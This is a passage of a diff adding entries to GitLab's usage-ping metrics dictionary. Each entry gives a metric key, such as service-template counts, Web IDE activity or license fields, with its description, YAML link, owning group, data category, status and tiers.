+Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_microsoft_teams_active` + +Count of active service templates for Microsoft Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180019_templates_microsoft_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_mock_ci_active` + +Count of active service templates for Mock CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182726_templates_mock_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_mock_monitoring_active` + +Count of active service templates for Mock Monitoring + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182738_templates_mock_monitoring_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_packagist_active` + +Count of active service templates for Packagist + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180030_templates_packagist_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_pipelines_email_active` + +Count of active service templates for Pipeline Emails + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180041_templates_pipelines_email_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_pivotaltracker_active` + +Count of active service templates for Pivotal Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180052_templates_pivotaltracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_prometheus_active` + +Count of active service templates for Prometheus + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180934_templates_prometheus_active.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_pushover_active` + +Count of active service templates for Pushover + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180104_templates_pushover_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_redmine_active` + +Count of active service templates for Redmine + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180115_templates_redmine_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_slack_active` + +Count of active service templates for Slack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180126_templates_slack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_slack_slash_commands_active` + +Count of active service templates for Slack (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180137_templates_slack_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_teamcity_active` + +Count of active service templates for Teamcity CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180148_templates_teamcity_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_unify_circuit_active` + +Count of active service templates for Unifiy Circuit + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180159_templates_unify_circuit_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_webex_teams_active` + +Count of active service templates for Webex Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180210_templates_webex_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_youtrack_active` + +Count of active service templates for YouTrack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180221_templates_youtrack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.terraform_reports` + +Count of Terraform MR reports generated + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175324_terraform_reports.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.terraform_states` + +Count of GitLab Managed Terraform States + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175326_terraform_states.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.todos` + +Count of todos created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181256_todos.yml) + +Group: `group::project management` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.uploads` + +Count of Uploads via Notes and Descriptions + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181109_uploads.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.user_preferences_group_overview_details` + +Count of users who set personal preference to see Details on Group information page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182203_user_preferences_group_overview_details.yml) + +Group: `group::threat insights` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.user_preferences_group_overview_security_dashboard` + +Count of users who set personal preference to see Security Dashboard on Group information page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182205_user_preferences_group_overview_security_dashboard.yml) + +Group: `group::threat insights` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.user_preferences_user_gitpod_enabled` + +Count of users with the GitPod integration enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180304_user_preferences_user_gitpod_enabled.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.web_hooks` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175621_web_hooks.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.web_ide_commits` + +Count of commits made from the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180242_web_ide_commits.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.web_ide_merge_requests` + +Count of merge requests created from the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180246_web_ide_merge_requests.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.web_ide_pipelines` + +Count of Pipeline tab views in the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180252_web_ide_pipelines.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.web_ide_previews` + +Count of Live Preview tab views in the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180248_web_ide_previews.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.web_ide_terminals` + +Count of Web Terminal tab views in the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180250_web_ide_terminals.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.web_ide_views` + +Count of views of the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180244_web_ide_views.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.wiki_pages_create` + +Count of all Wiki pages created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180734_wiki_pages_create.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.wiki_pages_delete` + +Count of all Wiki pages deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180738_wiki_pages_delete.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.wiki_pages_update` + +Count of all Wiki page updates + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180736_wiki_pages_update.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.wiki_pages_view` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183023_wiki_pages_view.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts_monthly.aggregated_metrics.code_review_category_monthly_active_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210427102618_code_review_category_monthly_active_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.code_review_extension_category_monthly_active_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210427103010_code_review_extension_category_monthly_active_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.code_review_group_monthly_active_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210427103119_code_review_group_monthly_active_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.compliance_features_track_unique_visits_union` + +Unique users that have used audit event screen, audit event API, compliance dashboard, or credential inventory + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183201_compliance_features_track_unique_visits_union.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.i_testing_paid_monthly_active_user_total` + +Aggregated count of users who have engaged with a Premium or Ultimate tier testing feature per month. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183209_i_testing_paid_monthly_active_user_total.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.incident_management_alerts_total_unique_counts` + +Count of unique users per month to take an action on an alert + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180509_incident_management_alerts_total_unique_counts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.incident_management_incidents_total_unique_counts` + +Count of unique users per month to take an action on an incident + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180511_incident_management_incidents_total_unique_counts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.product_analytics_test_metrics_intersection` + +This was test metric used for purpose of assuring correct implementation of aggregated metrics feature + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183205_product_analytics_test_metrics_intersection.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.aggregated_metrics.product_analytics_test_metrics_union` + +This was test metric used for purpose of assuring correct implementation of aggregated metrics feature + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183203_product_analytics_test_metrics_union.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.deployments` + +Total deployments count for recent 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210201124930_deployments.yml) + +Group: `group::ops release` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.failed_deployments` + +Total failed deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181924_failed_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts_monthly.packages` + +A monthly count of packages published to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181050_packages.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.personal_snippets` + +Monthly count of personal Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180308_personal_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.project_snippets` + +Monthly count of project Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180310_project_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.projects` + +Count number of projects created monthly + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210514141518_monthly_projects_creation.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.projects_with_alerts_created` + +Monthly count of unique projects with HTTP alerting enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183159_projects_with_alerts_created.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.snippets` + +Monthly count of All Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180312_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_monthly.successful_deployments` + +Total successful deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181923_successful_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts_weekly.aggregated_metrics.code_review_category_monthly_active_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210427103407_code_review_category_monthly_active_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.code_review_extension_category_monthly_active_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210427103452_code_review_extension_category_monthly_active_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.code_review_group_monthly_active_users` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210427103328_code_review_group_monthly_active_users.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.compliance_features_track_unique_visits_union` + +Unique users that have used audit event screen, audit event API, compliance dashboard, or credential inventory + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183211_compliance_features_track_unique_visits_union.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.i_testing_paid_monthly_active_user_total` + +Aggregated count of users who have engaged with a Premium or Ultimate tier testing feature per week. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183219_i_testing_paid_monthly_active_user_total.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.incident_management_alerts_total_unique_counts` + +Count of unique users per week to take an action on an alert + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180513_incident_management_alerts_total_unique_counts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.incident_management_incidents_total_unique_counts` + +Count of unique users per week to take an action on an incident + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180515_incident_management_incidents_total_unique_counts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.product_analytics_test_metrics_intersection` + +This was test metric used for purpose of assuring correct implementation of aggregated metrics feature + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216183215_product_analytics_test_metrics_intersection.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts_weekly.aggregated_metrics.product_analytics_test_metrics_union` + +This was test metric used for purpose of assuring correct implementation of aggregated metrics feature + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216183213_product_analytics_test_metrics_union.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `database.adapter` + +This metric only returns a value of PostgreSQL in supported versions of GitLab. It could be removed from the usage ping. Historically MySQL was also supported. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210201124935_database_adapter.yml) + +Group: `group::enablement distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `database.pg_system_id` + +TBD + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216183248_pg_system_id.yml) + +Group: `group::distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `database.version` + +The version of the PostgreSQL database. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216175609_version.yml) + +Group: `group::distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `dependency_proxy_enabled` + +A count of projects where the dependency proxy is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124900_dependency_proxy_enabled.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `edition` + +Edition of GitLab such as EE or CE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216175604_edition.yml) + +Group: `group::distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `elasticsearch_enabled` + +Whether Elasticsearch is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210204124924_elasticsearch_enabled.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `geo_enabled` + +Is Geo enabled? + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/settings/20210216180406_geo_enabled.yml) + +Group: `group::geo` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `git.version` + +Information about Git version + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210216183237_version.yml) + +Group: `group::distribution` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `gitaly.clusters` + +Total GitLab Managed clusters both enabled and disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210204124932_clusters.yml) + +Group: `group::product intelligence` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `gitaly.filesystems` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216183241_filesystems.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `gitaly.servers` + +Total Gitalty Servers + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210204124930_servers.yml) + +Group: `group::product intelligence` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `gitaly.version` + +Version of Gitaly + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210204124928_version.yml) + +Group: `group::product intelligence` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `gitlab_pages.enabled` + +Whether GitLab Pages is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124934_enabled.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `gitlab_pages.version` + +The version number of GitLab Pages + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210204124936_version.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `gitlab_shared_runners_enabled` + +Whether shared runners is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124902_gitlab_shared_runners_enabled.yml) + +Group: `group::runner` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `gitpod_enabled` + +Whether Gitpod is enabled in the instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180314_gitpod_enabled.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `grafana_link_enabled` + +Whether Grafana is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124922_grafana_link_enabled.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `gravatar_enabled` + +Whether gravatar is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124904_gravatar_enabled.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `historical_max_users` + +The peak active user count. Active is defined in UsersStatistics model. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124835_historical_max_users.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `hostname` + +Host name of GitLab instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210204124827_hostname.yml) + +Group: `group::product intelligence` + +Data Category: `Standard` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `ingress_modsecurity_enabled` + +Whether or not ModSecurity is enabled within Ingress + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216175459_ingress_modsecurity_enabled.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `installation_type` + +The installation method used to install GitLab (Omnibus, Helm, etc) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210216175602_installation_type.yml) + +Group: `group::distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `instance_auto_devops_enabled` + +Whether auto DevOps is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124856_instance_auto_devops_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `ldap_enabled` + +Whether LDAP is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124906_ldap_enabled.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `license_billable_users` + +Number of all billable users (active users excluding bots and guests). + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210531204603_license_billable_users.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `premium`, `ultimate` + +### `license_expires_at` + +The date the license ends + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124847_license_expires_at.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `license_id` + +The ID of the license + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124833_license_id.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `license_md5` + +The MD5 hash of license key of the GitLab instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124831_license_md5.yml) + +Group: `group::license` + +Data Category: `Standard` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `license_plan` + +The plan of the GitLab license + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124849_license_plan.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `license_starts_at` + +The date the license starts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124845_license_starts_at.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `license_subscription_id` + +Licese zuora_subscription_id + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124852_license_subscription_id.yml) + +Group: `group::license` + +Data Category: `Standard` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `license_trial` + +Whether this is a trial license or not + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124851_license_trial.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `license_trial_ends_on` + +Date the trial license ends on + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124926_license_trial_ends_on.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `license_user_count` + +The number of seats included in the license + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124843_license_user_count.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `licensee.Company` + +Company on the GitLab license + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124841_company.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `licensee.Email` + +Email on the GitLab license + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124839_email.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `licensee.Name` + +Name on the GitLab license + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124837_name.yml) + +Group: `group::license` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### 